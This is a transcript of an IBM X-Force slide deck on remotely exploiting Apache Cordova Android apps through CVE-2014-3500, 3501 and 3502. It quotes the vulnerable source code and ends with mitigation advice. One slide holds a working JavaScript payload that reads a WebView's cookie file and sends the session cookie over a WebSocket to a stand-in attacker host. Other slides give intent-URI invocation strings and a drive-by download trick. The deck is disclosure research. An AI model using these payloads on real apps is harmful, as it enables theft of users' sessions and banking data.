THE BANK JOB: MOBILE EDITION - OWASP · THE BANK JOB: MOBILE EDITION Remote Exploitation of the...
Transcript of THE BANK JOB: MOBILE EDITION - OWASP · THE BANK JOB: MOBILE EDITION Remote Exploitation of the...
![Page 1: THE BANK JOB: MOBILE EDITION - OWASP · THE BANK JOB: MOBILE EDITION Remote Exploitation of the Cordova Framework Roee Hay & David Kaplan IBM Security Systems X-Force Application](https://reader035.fdocuments.us/reader035/viewer/2022062601/5c341dd909d3f217298bb133/html5/thumbnails/1.jpg)
THE BANK JOB: MOBILE EDITION Remote Exploitation of the Cordova Framework
Roee Hay & David Kaplan IBM Security Systems X-Force Application Security Research Team
![Page 2: THE BANK JOB: MOBILE EDITION - OWASP · THE BANK JOB: MOBILE EDITION Remote Exploitation of the Cordova Framework Roee Hay & David Kaplan IBM Security Systems X-Force Application](https://reader035.fdocuments.us/reader035/viewer/2022062601/5c341dd909d3f217298bb133/html5/thumbnails/2.jpg)
APACHE CORDOVA
![Page 3: THE BANK JOB: MOBILE EDITION - OWASP · THE BANK JOB: MOBILE EDITION Remote Exploitation of the Cordova Framework Roee Hay & David Kaplan IBM Security Systems X-Force Application](https://reader035.fdocuments.us/reader035/viewer/2022062601/5c341dd909d3f217298bb133/html5/thumbnails/3.jpg)
Apache Cordova
Android
Native App
![Page 4: THE BANK JOB: MOBILE EDITION - OWASP · THE BANK JOB: MOBILE EDITION Remote Exploitation of the Cordova Framework Roee Hay & David Kaplan IBM Security Systems X-Force Application](https://reader035.fdocuments.us/reader035/viewer/2022062601/5c341dd909d3f217298bb133/html5/thumbnails/4.jpg)
Apache Cordova
Native App
Native App
Native App
Android iOS Windows Phone
![Page 5: THE BANK JOB: MOBILE EDITION - OWASP · THE BANK JOB: MOBILE EDITION Remote Exploitation of the Cordova Framework Roee Hay & David Kaplan IBM Security Systems X-Force Application](https://reader035.fdocuments.us/reader035/viewer/2022062601/5c341dd909d3f217298bb133/html5/thumbnails/5.jpg)
Apache Cordova
HTML5 App
Android
![Page 6: THE BANK JOB: MOBILE EDITION - OWASP · THE BANK JOB: MOBILE EDITION Remote Exploitation of the Cordova Framework Roee Hay & David Kaplan IBM Security Systems X-Force Application](https://reader035.fdocuments.us/reader035/viewer/2022062601/5c341dd909d3f217298bb133/html5/thumbnails/6.jpg)
Apache Cordova
HTML5 App
HTML5 App
HTML5 App
Android iOS Windows Phone
![Page 7: THE BANK JOB: MOBILE EDITION - OWASP · THE BANK JOB: MOBILE EDITION Remote Exploitation of the Cordova Framework Roee Hay & David Kaplan IBM Security Systems X-Force Application](https://reader035.fdocuments.us/reader035/viewer/2022062601/5c341dd909d3f217298bb133/html5/thumbnails/7.jpg)
Apache Cordova
5.81% of all Android apps
AppBrain Stats
![Page 8: THE BANK JOB: MOBILE EDITION - OWASP · THE BANK JOB: MOBILE EDITION Remote Exploitation of the Cordova Framework Roee Hay & David Kaplan IBM Security Systems X-Force Application](https://reader035.fdocuments.us/reader035/viewer/2022062601/5c341dd909d3f217298bb133/html5/thumbnails/8.jpg)
ANDROID APP SECURITY
![Page 9: THE BANK JOB: MOBILE EDITION - OWASP · THE BANK JOB: MOBILE EDITION Remote Exploitation of the Cordova Framework Roee Hay & David Kaplan IBM Security Systems X-Force Application](https://reader035.fdocuments.us/reader035/viewer/2022062601/5c341dd909d3f217298bb133/html5/thumbnails/9.jpg)
Feature Restriction
• Sensitive features are restricted by default.
• Usually can be enabled by acquiring permissions.
SmsManager sms = SmsManager.getDefault(); sms.sendTextMessage(phoneNumber, null, message, null, null);
android.permission.SEND_SMS requires
![Page 10: THE BANK JOB: MOBILE EDITION - OWASP · THE BANK JOB: MOBILE EDITION Remote Exploitation of the Cordova Framework Roee Hay & David Kaplan IBM Security Systems X-Force Application](https://reader035.fdocuments.us/reader035/viewer/2022062601/5c341dd909d3f217298bb133/html5/thumbnails/10.jpg)
• Goal. Abuses System services for its own profit: • Premium SMS numbers • GPS access • System log access
• Prerequisites. None. • Attack Vector. Malware • Detectability. Suspicious use of
permissions
Abuse of Feature Restriction
![Page 11: THE BANK JOB: MOBILE EDITION - OWASP · THE BANK JOB: MOBILE EDITION Remote Exploitation of the Cordova Framework Roee Hay & David Kaplan IBM Security Systems X-Force Application](https://reader035.fdocuments.us/reader035/viewer/2022062601/5c341dd909d3f217298bb133/html5/thumbnails/11.jpg)
Android Application Sandbox
• Isolates app data from being accessed by malware
• Mainly implemented by per-app package Linux user.
App A
App B
App C
App D
App E
App F
![Page 12: THE BANK JOB: MOBILE EDITION - OWASP · THE BANK JOB: MOBILE EDITION Remote Exploitation of the Cordova Framework Roee Hay & David Kaplan IBM Security Systems X-Force Application](https://reader035.fdocuments.us/reader035/viewer/2022062601/5c341dd909d3f217298bb133/html5/thumbnails/12.jpg)
• Goal • Subvert the Integrity & Confidentiality of
other apps
• Prerequisites • Target apps must be vulnerable
• Attack vectors • Malware • Drive-By Exploitation (Naïve Browse)
• Detectability • Harder – No use of permissions
Abuse of the Sandbox
![Page 13: THE BANK JOB: MOBILE EDITION - OWASP · THE BANK JOB: MOBILE EDITION Remote Exploitation of the Cordova Framework Roee Hay & David Kaplan IBM Security Systems X-Force Application](https://reader035.fdocuments.us/reader035/viewer/2022062601/5c341dd909d3f217298bb133/html5/thumbnails/13.jpg)
ATTACK OUTLINE
![Page 14: THE BANK JOB: MOBILE EDITION - OWASP · THE BANK JOB: MOBILE EDITION Remote Exploitation of the Cordova Framework Roee Hay & David Kaplan IBM Security Systems X-Force Application](https://reader035.fdocuments.us/reader035/viewer/2022062601/5c341dd909d3f217298bb133/html5/thumbnails/14.jpg)
Cordova App
Remote Drive-By Attack (Simplified)
Victim’s Device
![Page 15: THE BANK JOB: MOBILE EDITION - OWASP · THE BANK JOB: MOBILE EDITION Remote Exploitation of the Cordova Framework Roee Hay & David Kaplan IBM Security Systems X-Force Application](https://reader035.fdocuments.us/reader035/viewer/2022062601/5c341dd909d3f217298bb133/html5/thumbnails/15.jpg)
Cordova App
Remote Drive-By Attack (Simplified)
Naïve Browse
Victim’s Device
![Page 16: THE BANK JOB: MOBILE EDITION - OWASP · THE BANK JOB: MOBILE EDITION Remote Exploitation of the Cordova Framework Roee Hay & David Kaplan IBM Security Systems X-Force Application](https://reader035.fdocuments.us/reader035/viewer/2022062601/5c341dd909d3f217298bb133/html5/thumbnails/16.jpg)
Cordova App
Remote Drive-By Attack (Simplified)
Malicious Data
Victim’s Device
![Page 17: THE BANK JOB: MOBILE EDITION - OWASP · THE BANK JOB: MOBILE EDITION Remote Exploitation of the Cordova Framework Roee Hay & David Kaplan IBM Security Systems X-Force Application](https://reader035.fdocuments.us/reader035/viewer/2022062601/5c341dd909d3f217298bb133/html5/thumbnails/17.jpg)
Cordova App
Remote Drive-By Attack (Simplified)
Malicious Invocation
Victim’s Device
![Page 18: THE BANK JOB: MOBILE EDITION - OWASP · THE BANK JOB: MOBILE EDITION Remote Exploitation of the Cordova Framework Roee Hay & David Kaplan IBM Security Systems X-Force Application](https://reader035.fdocuments.us/reader035/viewer/2022062601/5c341dd909d3f217298bb133/html5/thumbnails/18.jpg)
Remote Drive-By Attack (Simplified)
Victim’s Device
![Page 19: THE BANK JOB: MOBILE EDITION - OWASP · THE BANK JOB: MOBILE EDITION Remote Exploitation of the Cordova Framework Roee Hay & David Kaplan IBM Security Systems X-Force Application](https://reader035.fdocuments.us/reader035/viewer/2022062601/5c341dd909d3f217298bb133/html5/thumbnails/19.jpg)
Remote Drive-By Attack (Simplified)
Sensitive data leak
Victim’s Device
![Page 20: THE BANK JOB: MOBILE EDITION - OWASP · THE BANK JOB: MOBILE EDITION Remote Exploitation of the Cordova Framework Roee Hay & David Kaplan IBM Security Systems X-Force Application](https://reader035.fdocuments.us/reader035/viewer/2022062601/5c341dd909d3f217298bb133/html5/thumbnails/20.jpg)
DEMO
![Page 21: THE BANK JOB: MOBILE EDITION - OWASP · THE BANK JOB: MOBILE EDITION Remote Exploitation of the Cordova Framework Roee Hay & David Kaplan IBM Security Systems X-Force Application](https://reader035.fdocuments.us/reader035/viewer/2022062601/5c341dd909d3f217298bb133/html5/thumbnails/21.jpg)
STEP I: MALICIOUS INVOCATION
Cordova App
Malicious Invocation
![Page 22: THE BANK JOB: MOBILE EDITION - OWASP · THE BANK JOB: MOBILE EDITION Remote Exploitation of the Cordova Framework Roee Hay & David Kaplan IBM Security Systems X-Force Application](https://reader035.fdocuments.us/reader035/viewer/2022062601/5c341dd909d3f217298bb133/html5/thumbnails/22.jpg)
Activities & IPC
App
C
A
D
B
C
• Activities – Building Block of Android apps
![Page 23: THE BANK JOB: MOBILE EDITION - OWASP · THE BANK JOB: MOBILE EDITION Remote Exploitation of the Cordova Framework Roee Hay & David Kaplan IBM Security Systems X-Force Application](https://reader035.fdocuments.us/reader035/viewer/2022062601/5c341dd909d3f217298bb133/html5/thumbnails/23.jpg)
Activities & IPC
App
C
A
D
B
C
• Activities – Building Block of Android apps
• Inter-Process communication using Intents
![Page 24: THE BANK JOB: MOBILE EDITION - OWASP · THE BANK JOB: MOBILE EDITION Remote Exploitation of the Cordova Framework Roee Hay & David Kaplan IBM Security Systems X-Force Application](https://reader035.fdocuments.us/reader035/viewer/2022062601/5c341dd909d3f217298bb133/html5/thumbnails/24.jpg)
Activities & IPC
App
C
A
D
B
C
• Activities – Building Block of Android apps
• Inter-Process communication using Intents
• Exported activities can be invoked by other apps
![Page 25: THE BANK JOB: MOBILE EDITION - OWASP · THE BANK JOB: MOBILE EDITION Remote Exploitation of the Cordova Framework Roee Hay & David Kaplan IBM Security Systems X-Force Application](https://reader035.fdocuments.us/reader035/viewer/2022062601/5c341dd909d3f217298bb133/html5/thumbnails/25.jpg)
Explicit vs Implicit Intents
App
C
A
D
B
C
• Explicit Intents – Target activities by their fully qualified identifier (e.g. App.B)
• Example: • Intent i = new Intent() • i.setClassName(“App”,”B”); • i.setData(“some payload”) • i.putExtra(“foo”,”bar”); • startActivity(i);
![Page 26: THE BANK JOB: MOBILE EDITION - OWASP · THE BANK JOB: MOBILE EDITION Remote Exploitation of the Cordova Framework Roee Hay & David Kaplan IBM Security Systems X-Force Application](https://reader035.fdocuments.us/reader035/viewer/2022062601/5c341dd909d3f217298bb133/html5/thumbnails/26.jpg)
Explicit vs Implicit Intents
D C
• Implicit Intents – Target is not specified. Resolution by Intent filters, e.g. URI scheme.
• Example #1: • Intent i = new Intent() • i.setData(“play://hello”); • i.putExtra(“foo”,”bar”); • startActivity(i);
![Page 27: THE BANK JOB: MOBILE EDITION - OWASP · THE BANK JOB: MOBILE EDITION Remote Exploitation of the Cordova Framework Roee Hay & David Kaplan IBM Security Systems X-Force Application](https://reader035.fdocuments.us/reader035/viewer/2022062601/5c341dd909d3f217298bb133/html5/thumbnails/27.jpg)
Explicit vs Implicit Intents
D C
• Implicit Intents – Target is not specified. Resolution by Intent filters, e.g. URI scheme.
• Example #2: • Intent i = new Intent() • i.setData(“https://www.ibm.com”); • i.putExtra(“foo”,”bar”); • startActivity(i);
![Page 28: THE BANK JOB: MOBILE EDITION - OWASP · THE BANK JOB: MOBILE EDITION Remote Exploitation of the Cordova Framework Roee Hay & David Kaplan IBM Security Systems X-Force Application](https://reader035.fdocuments.us/reader035/viewer/2022062601/5c341dd909d3f217298bb133/html5/thumbnails/28.jpg)
Explicit vs Implicit Intents
D C
• Implicit Intents – Target is not specified. Resolution by Intent filters, e.g. URI scheme.
• Example #2: • Intent i = new Intent() • i.setData(“https://www.ibm.com”); • startActivity(i);
![Page 29: THE BANK JOB: MOBILE EDITION - OWASP · THE BANK JOB: MOBILE EDITION Remote Exploitation of the Cordova Framework Roee Hay & David Kaplan IBM Security Systems X-Force Application](https://reader035.fdocuments.us/reader035/viewer/2022062601/5c341dd909d3f217298bb133/html5/thumbnails/29.jpg)
Remote Invocation via Browsers
A B
App
![Page 30: THE BANK JOB: MOBILE EDITION - OWASP · THE BANK JOB: MOBILE EDITION Remote Exploitation of the Cordova Framework Roee Hay & David Kaplan IBM Security Systems X-Force Application](https://reader035.fdocuments.us/reader035/viewer/2022062601/5c341dd909d3f217298bb133/html5/thumbnails/30.jpg)
Remote Invocation via Browsers
A B
App
Naïve Browse
![Page 31: THE BANK JOB: MOBILE EDITION - OWASP · THE BANK JOB: MOBILE EDITION Remote Exploitation of the Cordova Framework Roee Hay & David Kaplan IBM Security Systems X-Force Application](https://reader035.fdocuments.us/reader035/viewer/2022062601/5c341dd909d3f217298bb133/html5/thumbnails/31.jpg)
Remote Invocation via Browsers
Naïve Browse A B
App
HTML
![Page 32: THE BANK JOB: MOBILE EDITION - OWASP · THE BANK JOB: MOBILE EDITION Remote Exploitation of the Cordova Framework Roee Hay & David Kaplan IBM Security Systems X-Force Application](https://reader035.fdocuments.us/reader035/viewer/2022062601/5c341dd909d3f217298bb133/html5/thumbnails/32.jpg)
Remote Invocation via Browsers
Naïve Browse A B
App
HTML
Explicit Invocation: intent:#Intent;component=App/.B;S.param=data;end
![Page 33: THE BANK JOB: MOBILE EDITION - OWASP · THE BANK JOB: MOBILE EDITION Remote Exploitation of the Cordova Framework Roee Hay & David Kaplan IBM Security Systems X-Force Application](https://reader035.fdocuments.us/reader035/viewer/2022062601/5c341dd909d3f217298bb133/html5/thumbnails/33.jpg)
Remote Invocation via Browsers
Naïve Browse A B
App
HTML
Explicit Invocation: intent:#Intent;component=App/.B;S.param=data;end
Implicit Invocation: intent:#Intent;scheme=app://;S.param=data;end
![Page 34: THE BANK JOB: MOBILE EDITION - OWASP · THE BANK JOB: MOBILE EDITION Remote Exploitation of the Cordova Framework Roee Hay & David Kaplan IBM Security Systems X-Force Application](https://reader035.fdocuments.us/reader035/viewer/2022062601/5c341dd909d3f217298bb133/html5/thumbnails/34.jpg)
Remote Invocation via Browsers
A B
App
Intent
![Page 35: THE BANK JOB: MOBILE EDITION - OWASP · THE BANK JOB: MOBILE EDITION Remote Exploitation of the Cordova Framework Roee Hay & David Kaplan IBM Security Systems X-Force Application](https://reader035.fdocuments.us/reader035/viewer/2022062601/5c341dd909d3f217298bb133/html5/thumbnails/35.jpg)
Remote Invocation via Browsers
A B
App
Intent
Implicit Explicit Implicit Explicit
![Page 36: THE BANK JOB: MOBILE EDITION - OWASP · THE BANK JOB: MOBILE EDITION Remote Exploitation of the Cordova Framework Roee Hay & David Kaplan IBM Security Systems X-Force Application](https://reader035.fdocuments.us/reader035/viewer/2022062601/5c341dd909d3f217298bb133/html5/thumbnails/36.jpg)
STEP I DEMO
![Page 37: THE BANK JOB: MOBILE EDITION - OWASP · THE BANK JOB: MOBILE EDITION Remote Exploitation of the Cordova Framework Roee Hay & David Kaplan IBM Security Systems X-Force Application](https://reader035.fdocuments.us/reader035/viewer/2022062601/5c341dd909d3f217298bb133/html5/thumbnails/37.jpg)
STEP II: CROSS-APPLICATION SCRIPTING
![Page 38: THE BANK JOB: MOBILE EDITION - OWASP · THE BANK JOB: MOBILE EDITION Remote Exploitation of the Cordova Framework Roee Hay & David Kaplan IBM Security Systems X-Force Application](https://reader035.fdocuments.us/reader035/viewer/2022062601/5c341dd909d3f217298bb133/html5/thumbnails/38.jpg)
The Embedded Browser
Controlled by: WebView.loadUrl(String url)
In this case: WebView.loadUrl (“https://www.nytimes.com”)
![Page 39: THE BANK JOB: MOBILE EDITION - OWASP · THE BANK JOB: MOBILE EDITION Remote Exploitation of the Cordova Framework Roee Hay & David Kaplan IBM Security Systems X-Force Application](https://reader035.fdocuments.us/reader035/viewer/2022062601/5c341dd909d3f217298bb133/html5/thumbnails/39.jpg)
Cross-Application Scripting (XAS)
But what if… Intent i = getIntent(); WebView.loadUrl(i.getDataString())
On an exported activity.
![Page 40: THE BANK JOB: MOBILE EDITION - OWASP · THE BANK JOB: MOBILE EDITION Remote Exploitation of the Cordova Framework Roee Hay & David Kaplan IBM Security Systems X-Force Application](https://reader035.fdocuments.us/reader035/viewer/2022062601/5c341dd909d3f217298bb133/html5/thumbnails/40.jpg)
The Cordova XAS Vulnerability (CVE-2014-3500)
Vulnerable App
CordovaWebView.java @Override public void loadUrl(String url) { if (url.equals("about:blank") || url.startsWith("javascript:")) { this.loadUrlNow(url); } else { String initUrl = this.getProperty("url", null); // If first page of app, then set URL to load to be the one passed in if (initUrl == null) { this.loadUrlIntoView(url); } // Otherwise use the URL specified in the activity's extras bundle else { this.loadUrlIntoView(initUrl); } } }
![Page 41: THE BANK JOB: MOBILE EDITION - OWASP · THE BANK JOB: MOBILE EDITION Remote Exploitation of the Cordova Framework Roee Hay & David Kaplan IBM Security Systems X-Force Application](https://reader035.fdocuments.us/reader035/viewer/2022062601/5c341dd909d3f217298bb133/html5/thumbnails/41.jpg)
The Cordova XAS Vulnerability (CVE-2014-3500)
Vulnerable App
CordovaWebView.java @Override public void loadUrl(String url) { if (url.equals("about:blank") || url.startsWith("javascript:")) { this.loadUrlNow(url); } else { String initUrl = this.getProperty("url", null); // If first page of app, then set URL to load to be the one passed in if (initUrl == null) { this.loadUrlIntoView(url); } // Otherwise use the URL specified in the activity's extras bundle else { this.loadUrlIntoView(initUrl); } } }
String initUrl = this.getProperty("url", null);
this.loadUrlIntoView(initUrl);
WebView.loadUrl(url)
Intent Extra (“url”)
![Page 42: THE BANK JOB: MOBILE EDITION - OWASP · THE BANK JOB: MOBILE EDITION Remote Exploitation of the Cordova Framework Roee Hay & David Kaplan IBM Security Systems X-Force Application](https://reader035.fdocuments.us/reader035/viewer/2022062601/5c341dd909d3f217298bb133/html5/thumbnails/42.jpg)
Theft of Sensitive Files by Malware
malicious.js
![Page 43: THE BANK JOB: MOBILE EDITION - OWASP · THE BANK JOB: MOBILE EDITION Remote Exploitation of the Cordova Framework Roee Hay & David Kaplan IBM Security Systems X-Force Application](https://reader035.fdocuments.us/reader035/viewer/2022062601/5c341dd909d3f217298bb133/html5/thumbnails/43.jpg)
Theft of Sensitive Files by Malware
malicious.js
Intent with: file://.../malware/ .../malicious.js
![Page 44: THE BANK JOB: MOBILE EDITION - OWASP · THE BANK JOB: MOBILE EDITION Remote Exploitation of the Cordova Framework Roee Hay & David Kaplan IBM Security Systems X-Force Application](https://reader035.fdocuments.us/reader035/viewer/2022062601/5c341dd909d3f217298bb133/html5/thumbnails/44.jpg)
malicious.js
Intent with: file://.../malware/ .../malicious.js
Theft of Sensitive Files
malicious.js
1. Reads sensitive files using IFRAME/AJAX.
For example:
/app_webview/Cookies
2. Leak to attacker (explained below)
![Page 45: THE BANK JOB: MOBILE EDITION - OWASP · THE BANK JOB: MOBILE EDITION Remote Exploitation of the Cordova Framework Roee Hay & David Kaplan IBM Security Systems X-Force Application](https://reader035.fdocuments.us/reader035/viewer/2022062601/5c341dd909d3f217298bb133/html5/thumbnails/45.jpg)
Theft of Sensitive Files
Cordova to the Rescue! @TargetApi(16) private static class Level16Apis { static void enableUniversalAccess(WebSettings settings) { settings.setAllowUniversalAccessFromFileURLs(true); } }
Problem:
![Page 46: THE BANK JOB: MOBILE EDITION - OWASP · THE BANK JOB: MOBILE EDITION Remote Exploitation of the Cordova Framework Roee Hay & David Kaplan IBM Security Systems X-Force Application](https://reader035.fdocuments.us/reader035/viewer/2022062601/5c341dd909d3f217298bb133/html5/thumbnails/46.jpg)
Theft of Sensitive Files: Remote Attack Upgrade
![Page 47: THE BANK JOB: MOBILE EDITION - OWASP · THE BANK JOB: MOBILE EDITION Remote Exploitation of the Cordova Framework Roee Hay & David Kaplan IBM Security Systems X-Force Application](https://reader035.fdocuments.us/reader035/viewer/2022062601/5c341dd909d3f217298bb133/html5/thumbnails/47.jpg)
Theft of Sensitive Files: Remote Attack Upgrade
Naïve Browse
![Page 48: THE BANK JOB: MOBILE EDITION - OWASP · THE BANK JOB: MOBILE EDITION Remote Exploitation of the Cordova Framework Roee Hay & David Kaplan IBM Security Systems X-Force Application](https://reader035.fdocuments.us/reader035/viewer/2022062601/5c341dd909d3f217298bb133/html5/thumbnails/48.jpg)
Theft of Sensitive Files: Remote Attack Upgrade
Automatic File Download
![Page 49: THE BANK JOB: MOBILE EDITION - OWASP · THE BANK JOB: MOBILE EDITION Remote Exploitation of the Cordova Framework Roee Hay & David Kaplan IBM Security Systems X-Force Application](https://reader035.fdocuments.us/reader035/viewer/2022062601/5c341dd909d3f217298bb133/html5/thumbnails/49.jpg)
Theft of Sensitive Files: Remote Attack Upgrade
Automatic File Download
malicious.htm
Content-Type: application/octet-stream
<HTML> <SCRIPT>payload</SCRIPT> </HTML>
![Page 50: THE BANK JOB: MOBILE EDITION - OWASP · THE BANK JOB: MOBILE EDITION Remote Exploitation of the Cordova Framework Roee Hay & David Kaplan IBM Security Systems X-Force Application](https://reader035.fdocuments.us/reader035/viewer/2022062601/5c341dd909d3f217298bb133/html5/thumbnails/50.jpg)
Theft of Sensitive Files: Remote Attack Upgrade
Intent with: file:///sdcard/ malicious.htm
![Page 51: THE BANK JOB: MOBILE EDITION - OWASP · THE BANK JOB: MOBILE EDITION Remote Exploitation of the Cordova Framework Roee Hay & David Kaplan IBM Security Systems X-Force Application](https://reader035.fdocuments.us/reader035/viewer/2022062601/5c341dd909d3f217298bb133/html5/thumbnails/51.jpg)
Theft of Sensitive Files: Remote Attack Upgrade
Problem:
In practice:
• ~80% of devices are still below KITKAT • 61% of the exploitable apps in our sample set acquired at
least one of the external storage permissions.
![Page 52: THE BANK JOB: MOBILE EDITION - OWASP · THE BANK JOB: MOBILE EDITION Remote Exploitation of the Cordova Framework Roee Hay & David Kaplan IBM Security Systems X-Force Application](https://reader035.fdocuments.us/reader035/viewer/2022062601/5c341dd909d3f217298bb133/html5/thumbnails/52.jpg)
STEP II DEMO
![Page 53: THE BANK JOB: MOBILE EDITION - OWASP · THE BANK JOB: MOBILE EDITION Remote Exploitation of the Cordova Framework Roee Hay & David Kaplan IBM Security Systems X-Force Application](https://reader035.fdocuments.us/reader035/viewer/2022062601/5c341dd909d3f217298bb133/html5/thumbnails/53.jpg)
STEP III: DATA EXFILTRATION
Sensitive data leak
![Page 54: THE BANK JOB: MOBILE EDITION - OWASP · THE BANK JOB: MOBILE EDITION Remote Exploitation of the Cordova Framework Roee Hay & David Kaplan IBM Security Systems X-Force Application](https://reader035.fdocuments.us/reader035/viewer/2022062601/5c341dd909d3f217298bb133/html5/thumbnails/54.jpg)
Option I: Data Exfiltration to Remote Attacker
Sensitive data leak
![Page 55: THE BANK JOB: MOBILE EDITION - OWASP · THE BANK JOB: MOBILE EDITION Remote Exploitation of the Cordova Framework Roee Hay & David Kaplan IBM Security Systems X-Force Application](https://reader035.fdocuments.us/reader035/viewer/2022062601/5c341dd909d3f217298bb133/html5/thumbnails/55.jpg)
Option II: Data Exfiltration to Malware
Sensitive data leak
![Page 56: THE BANK JOB: MOBILE EDITION - OWASP · THE BANK JOB: MOBILE EDITION Remote Exploitation of the Cordova Framework Roee Hay & David Kaplan IBM Security Systems X-Force Application](https://reader035.fdocuments.us/reader035/viewer/2022062601/5c341dd909d3f217298bb133/html5/thumbnails/56.jpg)
Cordova Whitelists
Leak
Problem: Developer defined allowed end-points for network requests: https://webservice.mybank.com/ https://*.mybank.com/
Shouldn't be possible to exfiltrate data!
![Page 57: THE BANK JOB: MOBILE EDITION - OWASP · THE BANK JOB: MOBILE EDITION Remote Exploitation of the Cordova Framework Roee Hay & David Kaplan IBM Security Systems X-Force Application](https://reader035.fdocuments.us/reader035/viewer/2022062601/5c341dd909d3f217298bb133/html5/thumbnails/57.jpg)
Cordova Whitelist Bypass (CVE-2014-3501)
IceCreamCordovaWebViewClient.java @Override public WebResourceResponse shouldInterceptRequest(WebView view, String url) { try { // Check the against the white-list. if ((url.startsWith("http:") || url.startsWith("https:")) && !Config.isUrlWhiteListed(url)) { LOG.w(TAG, "URL blocked by whitelist: " + url); // Results in a 404. return new WebResourceResponse("text/plain", "UTF-8", null); } ... } }
Leak
![Page 58: THE BANK JOB: MOBILE EDITION - OWASP · THE BANK JOB: MOBILE EDITION Remote Exploitation of the Cordova Framework Roee Hay & David Kaplan IBM Security Systems X-Force Application](https://reader035.fdocuments.us/reader035/viewer/2022062601/5c341dd909d3f217298bb133/html5/thumbnails/58.jpg)
Cordova Whitelist Bypass (CVE-2014-3501)
IceCreamCordovaWebViewClient.java @Override public WebResourceResponse shouldInterceptRequest(WebView view, String url) { try { // Check the against the white-list. if ((url.startsWith("http:") || url.startsWith("https:")) && !Config.isUrlWhiteListed(url)) { LOG.w(TAG, "URL blocked by whitelist: " + url); // Results in a 404. return new WebResourceResponse("text/plain", "UTF-8", null); } ... } }
Leak
if ((url.startsWith("http:") || url.startsWith("https:")) && !Config.isUrlWhiteListed(url)) { <BLOCK REQUEST> }
Only checks HTTP/HTTPS against Whitelist!
![Page 59: THE BANK JOB: MOBILE EDITION - OWASP · THE BANK JOB: MOBILE EDITION Remote Exploitation of the Cordova Framework Roee Hay & David Kaplan IBM Security Systems X-Force Application](https://reader035.fdocuments.us/reader035/viewer/2022062601/5c341dd909d3f217298bb133/html5/thumbnails/59.jpg)
Cordova Whitelist Bypass (CVE-2014-3501)
IceCreamCordovaWebViewClient.java @Override public WebResourceResponse shouldInterceptRequest(WebView view, String url) { try { // Check the against the white-list. if ((url.startsWith("http:") || url.startsWith("https:")) && !Config.isUrlWhiteListed(url)) { LOG.w(TAG, "URL blocked by whitelist: " + url); // Results in a 404. return new WebResourceResponse("text/plain", "UTF-8", null); } ... } }
Leak
public WebResourceResponse shouldInterceptRequest(WebView view, String url) { … }
shouldInterceptRequest does not catch WebSockets now supported in Chrome-based WebView
![Page 60: THE BANK JOB: MOBILE EDITION - OWASP · THE BANK JOB: MOBILE EDITION Remote Exploitation of the Cordova Framework Roee Hay & David Kaplan IBM Security Systems X-Force Application](https://reader035.fdocuments.us/reader035/viewer/2022062601/5c341dd909d3f217298bb133/html5/thumbnails/60.jpg)
malicious.js
var req = new XMLHttpRequest();
req.open('GET', 'file://data/data/A/app_webview/Cookies', false); req.onreadystatechange = function() { if (req.readystate == 4) { var cookies = req.responseText; var offset = cookies.search('sessionCookie'); var session_cookie = cookies.substring(offset, offset + 81);
var ws = new WebSocket('ws://attacker.com/ws'); ws.onopen = function() { ws.send(session_cookie); }; } } req.send();
Theft of Sensitive Files (using CVE-2014-3501)
![Page 61: THE BANK JOB: MOBILE EDITION - OWASP · THE BANK JOB: MOBILE EDITION Remote Exploitation of the Cordova Framework Roee Hay & David Kaplan IBM Security Systems X-Force Application](https://reader035.fdocuments.us/reader035/viewer/2022062601/5c341dd909d3f217298bb133/html5/thumbnails/61.jpg)
Leak to other Apps via URL Loading (CVE-2014-3502)
CordovaWebViewClient.java @Override
public boolean shouldOverrideUrlLoading(WebView view, String url) { ... else {
if (url.startsWith("file://") || url.startsWith("data:") || Config.isUrlWhiteListed(url)) { return false; } // If not our application, let default viewer handle else { try { Intent intent = new Intent(Intent.ACTION_VIEW); intent.setData(Uri.parse(url)); this.cordova.getActivity().startActivity(intent); } catch (android.content.ActivityNotFoundException e) { ... } } } return true; }
Leak
![Page 62: THE BANK JOB: MOBILE EDITION - OWASP · THE BANK JOB: MOBILE EDITION Remote Exploitation of the Cordova Framework Roee Hay & David Kaplan IBM Security Systems X-Force Application](https://reader035.fdocuments.us/reader035/viewer/2022062601/5c341dd909d3f217298bb133/html5/thumbnails/62.jpg)
Leak to other Apps via URL Loading (CVE-2014-3502)
CordovaWebViewClient.java @Override
public boolean shouldOverrideUrlLoading(WebView view, String url) { ... else { if (url.startsWith("file://") || url.startsWith("data:") || Config.isUrlWhiteListed(url)) { return false; } // If not our application, let default viewer handle else { try { Intent intent = new Intent(Intent.ACTION_VIEW); intent.setData(Uri.parse(url)); this.cordova.getActivity().startActivity(intent); } catch (android.content.ActivityNotFoundException e) { ... } } } return true; }
Leak
So if NOT in whitelist, Execute default viewer!
if (url.startsWith("file://") || url.startsWith("data:") || Config.isUrlWhiteListed(url)) { return false; } … else { … Intent intent = new Intent(Intent.ACTION_VIEW); intent.setData(Uri.parse(url)); this.cordova.getActivity().startActivity(intent); }
![Page 63: THE BANK JOB: MOBILE EDITION - OWASP · THE BANK JOB: MOBILE EDITION Remote Exploitation of the Cordova Framework Roee Hay & David Kaplan IBM Security Systems X-Force Application](https://reader035.fdocuments.us/reader035/viewer/2022062601/5c341dd909d3f217298bb133/html5/thumbnails/63.jpg)
STEP III DEMO
![Page 64: THE BANK JOB: MOBILE EDITION - OWASP · THE BANK JOB: MOBILE EDITION Remote Exploitation of the Cordova Framework Roee Hay & David Kaplan IBM Security Systems X-Force Application](https://reader035.fdocuments.us/reader035/viewer/2022062601/5c341dd909d3f217298bb133/html5/thumbnails/64.jpg)
MITIGATION
![Page 65: THE BANK JOB: MOBILE EDITION - OWASP · THE BANK JOB: MOBILE EDITION Remote Exploitation of the Cordova Framework Roee Hay & David Kaplan IBM Security Systems X-Force Application](https://reader035.fdocuments.us/reader035/viewer/2022062601/5c341dd909d3f217298bb133/html5/thumbnails/65.jpg)
Cordova Cross-Application Scripting (CVE-2014-3500)
Leak
Developers, Upgrade to Cordova 3.5.1!!
![Page 66: THE BANK JOB: MOBILE EDITION - OWASP · THE BANK JOB: MOBILE EDITION Remote Exploitation of the Cordova Framework Roee Hay & David Kaplan IBM Security Systems X-Force Application](https://reader035.fdocuments.us/reader035/viewer/2022062601/5c341dd909d3f217298bb133/html5/thumbnails/66.jpg)
Avoiding Cross-Application Scripting
Leak
Avoid the vulnerability:
Never allow user input to control the embedded browser’s URL via WebView.loadUrl
